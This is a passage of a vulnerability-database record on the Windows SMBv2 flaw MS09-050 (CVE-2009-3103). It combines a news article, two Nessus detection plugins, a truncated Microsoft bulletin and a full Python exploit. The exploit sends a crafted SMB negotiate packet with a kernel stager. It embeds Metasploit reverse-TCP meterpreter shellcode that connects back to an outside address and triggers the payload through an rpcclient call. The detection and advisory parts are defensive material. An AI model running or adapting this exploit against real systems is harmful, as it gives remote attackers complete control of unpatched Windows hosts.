{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/", "https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/", "http://twitter.com/jness/statuses/3856921104", "http://www.microsoft.com/technet/security/advisory/975497.mspx", "http://blogs.zdnet.com/security/?p=4222", "http://blogs.zdnet.com/security/?p=4217", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103"], "description": "[](<https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/>)\n\nMicrosoft has issued a formal security advisory to confirm the [remote reboot flaw in its implementation of the SMB2 protocol](<https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/>), going a step further to warn that a successful attack could lead to remote code execution and full system takeover.\n\nThe vulnerability, which was originally released as a denial-of-service issue, does not affect the RTM version of Windows 7, Microsoft said. It appears [Microsoft fixed the flaw](<http://twitter.com/jness/statuses/3856921104>) in Windows 7 build ~7130, just after RC1. Windows Vista and Windows Server 2003 users remain at risk.\n\nThe Microsoft [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>) is somewhat confusing. It mentions the plural \u201cvulnerabilities\u201d in the title but later warns of \u201ca possible vulnerability in Microsoft Server Message Block (SMB) implementation.\u201d[ \n](<http://blogs.zdnet.com/security/?p=4222> \"Permanent Link to Windows 7, Vista exposed to 'teardrop attack'\" )\n\nIt is, however, very clear about the risk severity:\n\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart.[ \n](<http://blogs.zdnet.com/security/?p=4217> \"Permanent Link to Microsoft patches gaping Windows worm holes\" )\n\nMicrosoft points to [this CVE entry](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) to explain the actual bug:\n\nArray index error in the SMB2 protocol implementation in srv2.sys in Microsoft Windows 7, Server 2008, and Vista Gold, SP1, and SP2 allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location.\n\nProof of concept code, which allows an attacker to remotely crash any vulnerable machine with SMB enabled, is publicly available.\n\nIn the absence of patch, Microsoft recommends that users disable SMB v2 and block TCP ports 139 and 445 at the firewall.\n", "reporter": "Ryan Naraine", "published": "2009-09-11T12:12:04", "type": "threatpost", "title": "Microsoft Confirms SMB2 Flaw, Heightens Severity", "enchantments": {"score": {"modified": "2018-10-06T23:09:38", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2009-3103", "CVE-2017-11882"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:39:49", "id": "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "href": "https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/72229/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-11-17T02:54:26", "references": ["http://www.nessus.org/u?0f72ec72", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-050"], "pluginID": "40887", "description": "The remote host is running a version of Microsoft Windows Vista or Windows Server 2008 that contains a vulnerability in its SMBv2 implementation. An attacker can exploit this flaw to disable the remote host or to execute arbitrary code on it.\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "edition": 13, "reporter": "Tenable", "published": "2009-09-08T00:00:00", "title": "MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (EDUCATEDSCHOLAR) (uncredentialed check)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2532", "CVE-2009-3103"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB2_PID_HIGH_VULN.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40887", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40887);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2009-2532\", \"CVE-2009-3103\");\n script_bugtraq_id(36299, 36594);\n script_xref(name:\"MSFT\", value:\"MS09-050\");\n script_xref(name:\"CERT\", value:\"135940\");\n script_xref(name:\"EDB-ID\", value:\"9594\");\n script_xref(name:\"EDB-ID\", value:\"10005\");\n script_xref(name:\"EDB-ID\", value:\"12524\");\n script_xref(name:\"EDB-ID\", value:\"14674\");\n script_xref(name:\"EDB-ID\", value:\"16363\");\n script_xref(name:\"MSKB\", value:\"975497\");\n\n script_name(english:\"MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (EDUCATEDSCHOLAR) (uncredentialed check)\");\n script_summary(english:\"Determines if the remote host is affected by a SMBv2 vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code may be executed on the remote host through the SMB\nport\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Microsoft Windows Vista or\nWindows Server 2008 that contains a vulnerability in its SMBv2\nimplementation. An attacker can exploit this flaw to disable the\nremote host or to execute arbitrary code on it.\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f72ec72\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-050\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a patch for Windows Vista and Windows Server\n2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_require_ports(139, 445);\n exit(0);\n}\n\n#\n\ninclude(\"smb_func.inc\");\n\nport = 445;\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp(port);\nif ( ! soc ) exit(0);\nsession_set_socket(socket:soc);\n\n\n#---------------------------------------------------------#\n# struct { #\n# BYTE Protocol[4]; # \"\\xFFSMB\" #\n# BYTE Command; #\n# DWORD Status; # Or BYTE ErrorClass; #\n# # BYTE Reserved; #\n# # WORD Error; #\n# BYTE Flags; #\n# WORD Flags2; #\n# WORD PidHigh; \t\t\t #\n# BYTE Signature[8]; #\n# WORD Reserved; #\n# WORD Tid; # Tree ID #\n# WORD Pid; # Process ID #\n# WORD Uid; # User ID #\n# WORD Mid; # Multiplex ID #\n# } #\n#---------------------------------------------------------#\n\n\nheader = '\\xFFSMB';\nheader += raw_byte(b:SMB_COM_NEGOTIATE);\nheader += nt_status(Status:STATUS_SUCCESS);\nheader += raw_byte (b:0x18);\nheader += raw_word (w:0xc853);\nheader += raw_word(w:0x0001); # Process ID high\nheader += raw_dword (d:session_get_sequencenumber()) + raw_dword (d:0);\nheader += raw_word (w:0);\nheader += raw_word (w:session_get_tid());\nheader += raw_word (w:session_get_pid());\nheader += raw_word (w:session_get_uid());\nheader += raw_word (w:session_get_mid());\n\nparameters = smb_parameters(data:NULL);\n\nns = supported_protocol;\n\nprotocol[0] = \"TENABLE_NETWORK_SECURITY\";\ndata = NULL;\nfor (i = 0; i < ns; i++)\n data += raw_byte (b:0x02) + ascii (string:protocol[i]);\ndata = smb_data (data:data);\n\n\npacket = netbios_packet (header:header, parameters:parameters, data:data);\n\nr = smb_sendrecv(data:packet);\nclose(soc);\n\nif ( !isnull(r) && \"ORK_SECURITY\" >< r )\n\tsecurity_hole(port);\nelse exit(0, \"The remote host is not vulnerable to this flaw\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-17T03:04:04", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-050"], "pluginID": "42106", "description": "The remote Windows host contains a vulnerable SMBv2 implementation with the following issues :\n\n - A specially crafted SMBv2 packet can cause an infinite loop in the Server service. A remote, unauthenticated attacker can exploit this to cause a denial of service. (CVE-2009-2526)\n\n - Sending a specially crafted SMBv2 packet to the Server service can result in code execution. A remote, unauthenticated attacker can exploit this to take complete control of the system. (CVE-2009-2532, CVE-2009-3103) (EDUCATEDSCHOLAR)\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "edition": 13, "reporter": "Tenable", "published": "2009-10-13T00:00:00", "title": "MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) (EDUCATEDSCHOLAR)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows : Microsoft Bulletins", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS09-050.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(42106);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2009-2526\", \"CVE-2009-2532\", \"CVE-2009-3103\");\n script_bugtraq_id(36299, 36594, 36595);\n script_xref(name:\"MSFT\", value:\"MS09-050\");\n script_xref(name:\"MSKB\", value:\"975517\");\n script_xref(name:\"CERT\", value:\"135940\");\n script_xref(name:\"EDB-ID\", value:\"9594\");\n script_xref(name:\"EDB-ID\", value:\"10005\");\n script_xref(name:\"EDB-ID\", value:\"12524\");\n script_xref(name:\"EDB-ID\", value:\"14674\");\n script_xref(name:\"EDB-ID\", value:\"16363\");\n\n script_name(english:\"MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) (EDUCATEDSCHOLAR)\");\n script_summary(english:\"Checks version of srv2.sys\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote SMB server can be abused to execute code remotely.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a vulnerable SMBv2 implementation with\nthe following issues :\n\n - A specially crafted SMBv2 packet can cause an\n infinite loop in the Server service. A remote,\n unauthenticated attacker can exploit this to cause\n a denial of service. (CVE-2009-2526)\n\n - Sending a specially crafted SMBv2 packet to the Server\n service can result in code execution. A remote,\n unauthenticated attacker can exploit this to take\n complete control of the system. (CVE-2009-2532,\n CVE-2009-3103) (EDUCATEDSCHOLAR)\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/ms09-050\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows Vista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS09-050';\nkb = '975517';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'0,2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista SP0 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6000.16927\", min_version:\"6.0.6000.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6000.21127\", min_version:\"6.0.6000.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP1 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6001.18331\", min_version:\"6.0.6001.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6001.22522\", min_version:\"6.0.6001.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP2 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6002.18112\", min_version:\"6.0.6002.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"srv2.sys\", version:\"6.0.6002.22225\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-20T05:22:09", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "ohnozzy", "published": "2016-02-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "modified": "2016-02-26T00:00:00", "id": "1337DAY-ID-25384", "href": "https://0day.today/exploit/description/25384", "sourceData": "# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py\r\n \r\n#!/usr/bin/python\r\n#This module depends on the linux command line program smbclient. \r\n#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.\r\n#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.\r\nimport tempfile\r\nimport sys\r\nimport subprocess\r\nfrom socket import socket\r\nfrom time import sleep\r\nfrom smb.SMBConnection import SMBConnection\r\n \r\n \r\ntry:\r\n \r\n target = sys.argv[1]\r\nexcept IndexError:\r\n print '\\nUsage: %s <target ip>\\n' % sys.argv[0]\r\n print 'Example: MS36299.py 192.168.1.1 1\\n'\r\n sys.exit(-1)\r\n \r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python\r\nshell = \"\"\r\nshell += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\" #fce8820000006089e531c0648b\r\nshell += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell += \"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell += \"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell += \"\\xff\\xd5\\x6a\\x05\\x68\\xc0\\xa8\\x1e\\x4d\\x68\\x02\\x00\\x01\"\r\nshell += \"\\xbb\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\"\r\nshell += \"\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell += \"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\"\r\nshell += \"\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\"\r\nshell += \"\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\"\r\nshell += \"\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\"\r\nshell += \"\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\r\nshell += \"\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\"\r\nshell += \"\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\"\r\nshell += \"\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\"\r\nshell += \"\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\"\r\nshell += \"\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\"\r\nshell += \"\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\"\r\nshell += \"\\x53\\xff\\xd5\"\r\n \r\n \r\n \r\nhost = target, 445\r\n \r\nbuff =\"\\x00\\x00\\x03\\x9e\\xff\\x53\\x4d\\x42\"\r\nbuff+=\"\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xc8\"\r\nbuff+=\"\\x17\\x02\" #high process ID\r\nbuff+=\"\\x00\\xe9\\x58\\x01\\x00\\x00\"\r\nbuff+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nbuff+=\"\\x00\\x00\\xfe\\xda\\x00\\x7b\\x03\\x02\"\r\nbuff+=\"\\x04\\x0d\\xdf\\xff\"*25\r\nbuff+=\"\\x00\\x02\\x53\\x4d\"\r\nbuff+=\"\\x42\\x20\\x32\\x2e\\x30\\x30\\x32\\x00\"\r\nbuff+=\"\\x00\\x00\\x00\\x00\"*37\r\nbuff+=\"\\xff\\xff\\xff\\xff\"*2\r\nbuff+=\"\\x42\\x42\\x42\\x42\"*7\r\nbuff+=\"\\xb4\\xff\\xff\\x3f\" #magic index\r\nbuff+=\"\\x41\\x41\\x41\\x41\"*6\r\nbuff+=\"\\x09\\x0d\\xd0\\xff\" #return address\r\n \r\n#stager_sysenter_hook from metasploit\r\n \r\nbuff+=\"\\xfc\\xfa\\xeb\\x1e\\x5e\\x68\\x76\\x01\"\r\nbuff+=\"\\x00\\x00\\x59\\x0f\\x32\\x89\\x46\\x5d\"\r\nbuff+=\"\\x8b\\x7e\\x61\\x89\\xf8\\x0f\\x30\\xb9\"\r\nbuff+=\"\\x16\\x02\\x00\\x00\\xf3\\xa4\\xfb\\xf4\"\r\nbuff+=\"\\xeb\\xfd\\xe8\\xdd\\xff\\xff\\xff\\x6a\"\r\nbuff+=\"\\x00\\x9c\\x60\\xe8\\x00\\x00\\x00\\x00\"\r\nbuff+=\"\\x58\\x8b\\x58\\x54\\x89\\x5c\\x24\\x24\"\r\nbuff+=\"\\x81\\xf9\\xde\\xc0\\xad\\xde\\x75\\x10\"\r\nbuff+=\"\\x68\\x76\\x01\\x00\\x00\\x59\\x89\\xd8\"\r\nbuff+=\"\\x31\\xd2\\x0f\\x30\\x31\\xc0\\xeb\\x31\"\r\nbuff+=\"\\x8b\\x32\\x0f\\xb6\\x1e\\x66\\x81\\xfb\"\r\nbuff+=\"\\xc3\\x00\\x75\\x25\\x8b\\x58\\x5c\\x8d\"\r\nbuff+=\"\\x5b\\x69\\x89\\x1a\\xb8\\x01\\x00\\x00\"\r\nbuff+=\"\\x80\\x0f\\xa2\\x81\\xe2\\x00\\x00\\x10\"\r\nbuff+=\"\\x00\\x74\\x0e\\xba\\x00\\xff\\x3f\\xc0\"\r\nbuff+=\"\\x83\\xc2\\x04\\x81\\x22\\xff\\xff\\xff\"\r\nbuff+=\"\\x7f\\x61\\x9d\\xc3\\xff\\xff\\xff\\xff\"\r\nbuff+=\"\\x00\\x04\\xdf\\xff\\x00\\x04\\xfe\\x7f\"\r\nbuff+=\"\\x60\\x6a\\x30\\x58\\x99\\x64\\x8b\\x18\"\r\nbuff+=\"\\x39\\x53\\x0c\\x74\\x2b\\x8b\\x43\\x10\"\r\nbuff+=\"\\x8b\\x40\\x3c\\x83\\xc0\\x28\\x8b\\x08\"\r\nbuff+=\"\\x03\\x48\\x03\\x81\\xf9\\x6c\\x61\\x73\"\r\nbuff+=\"\\x73\\x75\\x15\\xe8\\x07\\x00\\x00\\x00\"\r\nbuff+=\"\\xe8\\x0d\\x00\\x00\\x00\\xeb\\x09\\xb9\"\r\nbuff+=\"\\xde\\xc0\\xad\\xde\\x89\\xe2\\x0f\\x34\"\r\nbuff+=\"\\x61\\xc3\\x81\\xc4\\x54\\xf2\\xff\\xff\"\r\n \r\nbuff+=shell\r\n \r\ns = socket()\r\ns.connect(host)\r\ns.send(buff)\r\ns.close() \r\n#Trigger the above injected code via authenticated process.\r\nsubprocess.call(\"echo '1223456' | rpcclient -U Administrator %s\"%(target), shell=True)\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25384"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "references": [], "description": "Microsoft Security Bulletin MS09-050 - Critical\r\nVulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)\r\nPublished: October 13, 2009\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves one publicly disclosed and two privately reported vulnerabilities in Server Message Block Version 2 (SMBv2). The most severe of the vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB packet to a computer running the Server service. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate from outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\r\nThis security update is rated Critical for supported editions of Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by correctly validating the fields inside the SMBv2 packets, correcting the way that SMB handles the command value in SMB packets, and correcting the way that SMB parses specially crafted SMB packets. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update also addresses the vulnerability first described in Microsoft Security Advisory 975497.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 